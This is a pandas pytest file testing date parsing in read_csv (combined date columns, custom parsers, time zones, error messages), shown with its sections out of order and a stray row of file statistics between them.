"KORD", -0.99],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", -0.59],
], columns=["actual", "nominal", "X0", "X4"])
# Python can sometimes be flaky about how
# the aggregated columns are entered, so
# this standardizes the order.
result = result[expected.columns]
tm.assert_frame_equal(result, expected)
def test_multiple_date_col_timestamp_parse(all_parsers):
parser = all_parsers
data = """05/31/2012,15:30:00.029,1306.25,1,E,0,,1306.25
05/31/2012,15:30:00.029,1306.25,8,E,0,,1306.25"""
result = parser.read_csv(StringIO(data), parse_dates=[[0, 1]],
header=None, date_parser=Timestamp)
expected = DataFrame([
[Timestamp("05/31/2012, 15:30:00.029"),
1306.25, 1, "E", 0, np.nan, 1306.25],
[Timestamp("05/31/2012, 15:30:00.029"),
1306.25, 8, "E", 0, np.nan, 1306.25]
], columns=["0_1", 2, 3, 4, 5, 6, 7])
tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_with_header(all_parsers):
parser = all_parsers
data = """\
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000"""
result = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]})
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["nominal", "ID", "ActualTime", "TDew",
"TAir", "Windspeed", "Precip", "WindDir"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,parse_dates,msg", [
("""\
date_NominalTime,date,NominalTime
KORD1,19990127, 19:00:00
KORD2,19990127, 20:00:00""", [[1, 2]], ("New date column already "
"in dict date_NominalTime")),
("""\
ID,date,nominalTime
KORD,19990127, 19:00:00
KORD,19990127, 20:00:00""", dict(ID=[1, 2]), "Date column ID already in dict")
])
def test_multiple_date_col_name_collision(all_parsers, data, parse_dates, msg):
parser = all_parsers
with pytest.raises(ValueError, match=msg):
parser.read_csv(StringIO(data), parse_dates=parse_dates)
def test_date_parser_int_bug(all_parsers):
# see gh-3071
parser = all_parsers
data = ("posix_timestamp,elapsed,sys,user,queries,query_time,rows,"
"accountid,userid,contactid,level,silo,method\n"
"1343103150,0.062353,0,4,6,0.01690,3,"
"12345,1,-1,3,invoice_InvoiceResource,search\n")
result = parser.read_csv(
StringIO(data), index_col=0, parse_dates=[0],
date_parser=lambda x: datetime.utcfromtimestamp(int(x)))
expected = DataFrame([[0.062353, 0, 4, 6, 0.01690, 3, 12345, 1, -1,
3, "invoice_InvoiceResource", "search"]],
columns=["elapsed", "sys", "user", "queries",
"query_time", "rows", "accountid",
"userid", "contactid", "level",
"silo", "method"],
index=Index([Timestamp("2012-07-24 04:12:30")],
name="posix_timestamp"))
tm.assert_frame_equal(result, expected)
def test_nat_parse(all_parsers):
# see gh-3062
parser = all_parsers
df = DataFrame(dict({"A": np.asarray(lrange(10), dtype="float64"),
"B": pd.Timestamp("20010101")}))
df.iloc[3:6, :] = np.nan
with tm.ensure_clean("__nat_parse_.csv") as path:
df.to_csv(path)
result = parser.read_csv(path, index_col=0, parse_dates=["B"])
tm.assert_frame_equal(result, df)
def test_csv_custom_parser(all_parsers):
data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
parser = all_parsers
result = parser.read_csv(
StringIO(data),
date_parser=lambda x: datetime.strptime(x, "%Y%m%d"))
expected = parser.read_csv(StringIO(data), parse_dates=True)
tm.assert_frame_equal(result, expected)
def test_parse_dates_implicit_first_col(all_parsers):
data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), parse_dates=True)
expected = parser.read_csv(StringIO(data), index_col=0,
parse_dates=True)
tm.assert_frame_equal(result, expected)
def test_parse_dates_string(all_parsers):
data = """date,A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col="date",
parse_dates=["date"])
index = date_range("1/1/2009", periods=3)
index.name = "date"
expected = DataFrame({"A": ["a", "b", "c"], "B": [1, 3, 4],
"C": [2, 4, 5]}, index=index)
tm.assert_frame_equal(result, expected)
# Bug in https://github.com/dateutil/dateutil/issues/217
# has been addressed, but we just don't pass in the `yearfirst`
@pytest.mark.xfail(reason="yearfirst is not surfaced in read_*")
@pytest.mark.parametrize("parse_dates", [
[["date", "time"]],
[[0, 1]]
])
def test_yy_format_with_year_first(all_parsers, parse_dates):
data = """date,time,B,C
090131,0010,1,2
090228,1020,3,4
090331,0830,5,6
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col=0,
parse_dates=parse_dates)
index = DatetimeIndex([datetime(2009, 1, 31, 0, 10, 0),
datetime(2009, 2, 28, 10, 20, 0),
datetime(2009, 3, 31, 8, 30, 0)],
dtype=object, name="date_time")
expected = DataFrame({"B": [1, 3, 5], "C": [2, 4, 6]}, index=index)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("parse_dates", [[0, 2], ["a", "c"]])
def test_parse_dates_column_list(all_parsers, parse_dates):
data = "a,b,c\n01/01/2010,1,15/02/2010"
parser = all_parsers
expected = DataFrame({"a": [datetime(2010, 1, 1)], "b": [1],
"c": [datetime(2010, 2, 15)]})
expected = expected.set_index(["a", "b"])
result = parser.read_csv(StringIO(data), index_col=[0, 1],
parse_dates=parse_dates, dayfirst=True)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("index_col", [[0, 1], [1, 0]])
def test_multi_index_parse_dates(all_parsers, index_col):
data = """index1,index2,A,B,C
20090101,one,a,1,2
20090101,two,b,3,4
20090101,three,c,4,5
20090102,one,a,1,2
20090102,two,b,3,4
20090102,three,c,4,5
20090103,one,a,1,2
20090103,two,b,3,4
20090103,three,c,4,5
"""
parser = all_parsers
index = MultiIndex.from_product([
(datetime(2009, 1, 1), datetime(2009, 1, 2),
datetime(2009, 1, 3)), ("one", "two", "three")],
names=["index1", "index2"])
# Out of order.
if index_col == [1, 0]:
index = index.swaplevel(0, 1)
expected = DataFrame([["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
["a", 1, 2], ["b", 3, 4], ["c", 4, 5]],
columns=["A", "B", "C"], index=index)
result = parser.read_csv(StringIO(data), index_col=index_col,
parse_dates=True)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [
dict(dayfirst=True), dict(day_first=True)
])
def test_parse_dates_custom_euro_format(all_parsers, kwargs):
parser = all_parsers
data = """foo,bar,baz
31/01/2010,1,2
01/02/2010,1,NA
02/02/2010,1,2
"""
if "dayfirst" in kwargs:
df = parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
date_parser=lambda d: parse_date(d, **kwargs),
header=0, index_col=0, parse_dates=True,
na_values=["NA"])
exp_index = Index([datetime(2010, 1, 31), datetime(2010, 2, 1),
datetime(2010, 2, 2)], name="time")
expected = DataFrame({"Q": [1, 1, 1], "NTU": [2, np.nan, 2]},
index=exp_index, columns=["Q", "NTU"])
tm.assert_frame_equal(df, expected)
else:
msg = "got an unexpected keyword argument 'day_first'"
with pytest.raises(TypeError, match=msg):
parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
date_parser=lambda d: parse_date(d, **kwargs),
skiprows=[0], index_col=0, parse_dates=True,
na_values=["NA"])
def test_parse_tz_aware(all_parsers):
# See gh-1693
parser = all_parsers
data = "Date,x\n2012-06-13T01:39:00Z,0.5"
result = parser.read_csv(StringIO(data), index_col=0,
parse_dates=True)
expected = DataFrame({"x": [0.5]}, index=Index([Timestamp(
"2012-06-13 01:39:00+00:00")], name="Date"))
tm.assert_frame_equal(result, expected)
assert result.index.tz is pytz.utc
@pytest.mark.parametrize("parse_dates,index_col", [
({"nominal": [1, 2]}, "nominal"),
({"nominal": [1, 2]}, 0),
([[1, 2]], 0),
])
def test_multiple_date_cols_index(all_parsers, parse_dates, index_col):
parser = all_parsers
data = """
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD1,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD2,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD3,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD4,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD5,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD6,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), "KORD1", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), "KORD2", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), "KORD3", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), "KORD4", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), "KORD5", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), "KORD6", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["nominal", "ID", "ActualTime", "TDew",
"TAir", "Windspeed", "Precip", "WindDir"])
expected = expected.set_index("nominal")
if not isinstance(parse_dates, dict):
expected.index.name = "date_NominalTime"
result = parser.read_csv(StringIO(data), parse_dates=parse_dates,
index_col=index_col)
tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_chunked(all_parsers):
parser = all_parsers
data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["nominal", "ID", "actualTime", "A", "B", "C", "D", "E"])
expected = expected.set_index("nominal")
reader = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]},
index_col="nominal", chunksize=2)
chunks = list(reader)
tm.assert_frame_equal(chunks[0], expected[:2])
tm.assert_frame_equal(chunks[1], expected[2:4])
tm.assert_frame_equal(chunks[2], expected[4:])
def test_multiple_date_col_named_index_compat(all_parsers):
parser = all_parsers
data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
with_indices = parser.read_csv(StringIO(data),
parse_dates={"nominal": [1, 2]},
index_col="nominal")
with_names = parser.read_csv(StringIO(data), index_col="nominal",
parse_dates={"nominal": [
"date", "nominalTime"]})
tm.assert_frame_equal(with_indices, with_names)
def test_multiple_date_col_multiple_index_compat(all_parsers):
parser = all_parsers
data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
result = parser.read_csv(StringIO(data), index_col=["nominal", "ID"],
parse_dates={"nominal": [1, 2]})
expected = parser.read_csv(StringIO(data),
parse_dates={"nominal": [1, 2]})
expected = expected.set_index(["nominal", "ID"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [dict(), dict(index_col="C")])
def test_read_with_parse_dates_scalar_non_bool(all_parsers, kwargs):
# see gh-5636
parser = all_parsers
msg = ("Only booleans, lists, and dictionaries "
"are accepted for the 'parse_dates' parameter")
data = """A,B,C
1,2,2003-11-1"""
with pytest.raises(TypeError, match=msg):
parser.read_csv(StringIO(data), parse_dates="C", **kwargs)
@pytest.mark.parametrize("parse_dates", [
(1,), np.array([4, 5]), {1, 3, 3}
])
def test_read_with_parse_dates_invalid_type(all_parsers, parse_dates):
parser = all_parsers
msg = ("Only booleans, lists, and dictionaries "
"are accepted for the 'parse_dates' parameter")
data = """A,B,C
1,2,2003-11-1"""
with pytest.raises(TypeError, match=msg):
parser.read_csv(StringIO(data), parse_dates=(1,))
def test_parse_dates_empty_string(all_parsers):
# see gh-2263
parser = all_parsers
data = "Date,test\n2012-01-01,1\n,2"
result = parser.read_csv(StringIO(data), parse_dates=["Date"],
na_filter=False)
expected = DataFrame([[datetime(2012, 1, 1), 1], [pd.NaT, 2]],
columns=["Date", "test"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,kwargs,expected", [
("a\n04.15.2016", dict(parse_dates=["a"]),
DataFrame([datetime(2016, 4, 15)], columns=["a"])),
("a\n04.15.2016", dict(parse_dates=True, index_col=0),
DataFrame(index=DatetimeIndex(["2016-04-15"], name="a"))),
("a,b\n04.15.2016,09.16.2013", dict(parse_dates=["a", "b"]),
DataFrame([[datetime(2016, 4, 15), datetime(2013, 9, 16)]],
columns=["a", "b"])),
("a,b\n04.15.2016,09.16.2013", dict(parse_dates=True, index_col=[0, 1]),
DataFrame(index=MultiIndex.from_tuples(
[(datetime(2016, 4, 15), datetime(2013, 9, 16))], names=["a", "b"]))),
])
def test_parse_dates_no_convert_thousands(all_parsers, data, kwargs, expected):
# see gh-14066
parser = all_parsers
result = parser.read_csv(StringIO(data), thousands=".", **kwargs)
tm.assert_frame_equal(result, expected)
def test_parse_date_time_multi_level_column_name(all_parsers):
data = """\
D,T,A,B
date, time,a,b
2001-01-05, 09:00:00, 0.0, 10.
2001-01-06, 00:00:00, 1.0, 11.
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), header=[0, 1],
parse_dates={"date_time": [0, 1]},
date_parser=conv.parse_date_time)
expected_data = [[datetime(2001, 1, 5, 9, 0, 0), 0., 10.],
[datetime(2001, 1, 6, 0, 0, 0), 1., 11.]]
expected = DataFrame(expected_data,
columns=["date_time", ("A", "a"), ("B", "b")])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,kwargs,expected", [
("""\
date,time,a,b
2001-01-05, 10:00:00, 0.0, 10.
2001-01-05, 00:00:00, 1., 11.
""", dict(header=0, parse_dates={"date_time": [0, 1]}),
DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10],
[datetime(2001, 1, 5, 0, 0, 0), 1.0, 11.0]],
columns=["date_time", "a", "b"])),
(("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
"KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
"KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
"KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
"KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
"KORD,19990127, 23:00:00, 22:56:00, -0.5900"),
dict(header=None, parse_dates={"actual": [1, 2], "nominal": [1, 3]}),
DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", 0.81],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", 0.01],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", -0.99],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", -0.59]], columns=["actual", "nominal", 0, 4])),
])
def test_parse_date_time(all_parsers, data, kwargs, expected):
parser = all_parsers
result = parser.read_csv(StringIO(data), date_parser=conv.parse_date_time,
**kwargs)
# Python can sometimes be flaky about how
# the aggregated columns are entered, so
# this standardizes the order.
result = result[expected.columns]
tm.assert_frame_equal(result, expected)
def test_parse_date_fields(all_parsers):
parser = all_parsers
data = ("year,month,day,a\n2001,01,10,10.\n"
"2001,02,1,11.")
result = parser.read_csv(StringIO(data), header=0,
parse_dates={"ymd": [0, 1, 2]},
date_parser=conv.parse_date_fields)
expected = DataFrame([[datetime(2001, 1, 10), 10.],
[datetime(2001, 2, 1), 11.]], columns=["ymd", "a"])
tm.assert_frame_equal(result, expected)
def test_parse_date_all_fields(all_parsers):
parser = all_parsers
data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0,0.0,10.
2001,01,5,10,0,00,1.,11.
"""
result = parser.read_csv(StringIO(data), header=0,
date_parser=conv.parse_all_fields,
parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10.0],
[datetime(2001, 1, 5, 10, 0, 0), 1.0, 11.0]],
columns=["ymdHMS", "a", "b"])
tm.assert_frame_equal(result, expected)
def test_datetime_fractional_seconds(all_parsers):
parser = all_parsers
data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0.123456,0.0,10.
2001,01,5,10,0,0.500000,1.,11.
"""
result = parser.read_csv(StringIO(data), header=0,
date_parser=conv.parse_all_fields,
parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0,
microsecond=123456), 0.0, 10.0],
[datetime(2001, 1, 5, 10, 0, 0,
microsecond=500000), 1.0, 11.0]],
columns=["ymdHMS", "a", "b"])
tm.assert_frame_equal(result, expected)
def test_generic(all_parsers):
parser = all_parsers
data = "year,month,day,a\n2001,01,10,10.\n2001,02,1,11."
result = parser.read_csv(StringIO(data), header=0,
parse_dates={"ym": [0, 1]},
date_parser=lambda y, m: date(year=int(y),
month=int(m),
day=1))
expected = DataFrame([[date(2001, 1, 1), 10, 10.],
[date(2001, 2, 1), 1, 11.]],
columns=["ym", "day", "a"])
tm.assert_frame_equal(result, expected)
def test_date_parser_resolution_if_not_ns(all_parsers):
# see gh-10245
parser = all_parsers
data = """\
date,time,prn,rxstatus
2013-11-03,19:00:00,126,00E80000
2013-11-03,19:00:00,23,00E80000
2013-11-03,19:00:00,13,00E80000
"""
def date_parser(dt, time):
return np_array_datetime64_compat(dt + "T" + time + "Z",
dtype="datetime64[s]")
result = parser.read_csv(StringIO(data), date_parser=date_parser,
parse_dates={"datetime": ["date", "time"]},
index_col=["datetime", "prn"])
datetimes = np_array_datetime64_compat(["2013-11-03T19:00:00Z"] * 3,
dtype="datetime64[s]")
expected = DataFrame(data={"rxstatus": ["00E80000"] * 3},
index=MultiIndex.from_tuples(
[(datetimes[0], 126), (datetimes[1], 23),
(datetimes[2], 13)], names=["datetime", "prn"]))
tm.assert_frame_equal(result, expected)
def test_parse_date_column_with_empty_string(all_parsers):
# see gh-6428
parser = all_parsers
data = "case,opdate\n7,10/18/2006\n7,10/18/2008\n621, "
result = parser.read_csv(StringIO(data), parse_dates=["opdate"])
expected_data = [[7, "10/18/2006"],
[7, "10/18/2008"],
[621, " "]]
expected = DataFrame(expected_data, columns=["case", "opdate"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,expected", [
("a\n135217135789158401\n1352171357E+5",
DataFrame({"a": [135217135789158401,
135217135700000]}, dtype="float64")),
("a\n99999999999\n123456789012345\n1234E+0",
DataFrame({"a": [99999999999,
123456789012345,
1234]}, dtype="float64"))
])
@pytest.mark.parametrize("parse_dates", [True, False])
def test_parse_date_float(all_parsers, data, expected, parse_dates):
# see gh-2697
#
# Date parsing should fail, so we leave the data untouched
# (i.e. float precision should remain unchanged).
parser = all_parsers
result = parser.read_csv(StringIO(data), parse_dates=parse_dates)
tm.assert_frame_equal(result, expected)
def test_parse_timezone(all_parsers):
# see gh-22256
parser = all_parsers
data = """dt,val
2018-01-04 09:01:00+09:00,23350
2018-01-04 09:02:00+09:00,23400
2018-01-04 09:03:00+09:00,23400
2018-01-04 09:04:00+09:00,23400
2018-01-04 09:05:00+09:00,23400"""
result = parser.read_csv(StringIO(data), parse_dates=["dt"])
dti = pd.date_range(start="2018-01-04 09:01:00",
end="2018-01-04 09:05:00", freq="1min",
tz=pytz.FixedOffset(540))
expected_data = {"dt": dti, "val": [23350, 23400, 23400, 23400, 23400]}
expected = DataFrame(expected_data)
tm.assert_frame_equal(result, expected)
| 40.189189 | 79 | 0.570597 |
from datetime import date, datetime
from io import StringIO
import numpy as np
import pytest
import pytz
from pandas._libs.tslib import Timestamp
from pandas._libs.tslibs import parsing
from pandas.compat import lrange, parse_date
from pandas.compat.numpy import np_array_datetime64_compat
import pandas as pd
from pandas import DataFrame, DatetimeIndex, Index, MultiIndex
from pandas.core.indexes.datetimes import date_range
import pandas.util.testing as tm
import pandas.io.date_converters as conv
import pandas.io.parsers as parsers
def test_separator_date_conflict(all_parsers):
parser = all_parsers
data = "06-02-2013;13:00;1-000.215"
expected = DataFrame([[datetime(2013, 6, 2, 13, 0, 0), 1000.215]],
columns=["Date", 2])
df = parser.read_csv(StringIO(data), sep=";", thousands="-",
parse_dates={"Date": [0, 1]}, header=None)
tm.assert_frame_equal(df, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col_custom(all_parsers, keep_date_col):
data = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
parser = all_parsers
def date_parser(*date_cols):
return parsing.try_parse_dates(parsers._concat_date_cols(date_cols))
result = parser.read_csv(StringIO(data), header=None,
date_parser=date_parser, prefix="X",
parse_dates={"actual": [1, 2],
"nominal": [1, 3]},
keep_date_col=keep_date_col)
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", "19990127", " 19:00:00", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", "19990127", " 20:00:00", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", "19990127", " 21:00:00", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", "19990127", " 21:00:00", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", "19990127", " 22:00:00", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", "19990127", " 23:00:00", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["actual", "nominal", "X0", "X1", "X2",
"X3", "X4", "X5", "X6", "X7", "X8"])
if not keep_date_col:
expected = expected.drop(["X1", "X2", "X3"], axis=1)
elif parser.engine == "python":
expected["X1"] = expected["X1"].astype(np.int64)
result = result[expected.columns]
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col(all_parsers, keep_date_col):
data = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), header=None,
prefix="X", parse_dates=[[1, 2], [1, 3]],
keep_date_col=keep_date_col)
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", "19990127", " 19:00:00", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", "19990127", " 20:00:00", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", "19990127", " 21:00:00", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", "19990127", " 21:00:00", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", "19990127", " 22:00:00", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", "19990127", " 23:00:00", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["X1_X2", "X1_X3", "X0", "X1", "X2",
"X3", "X4", "X5", "X6", "X7", "X8"])
if not keep_date_col:
expected = expected.drop(["X1", "X2", "X3"], axis=1)
elif parser.engine == "python":
expected["X1"] = expected["X1"].astype(np.int64)
tm.assert_frame_equal(result, expected)
def test_date_col_as_index_col(all_parsers):
data = """\
KORD,19990127 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
"""
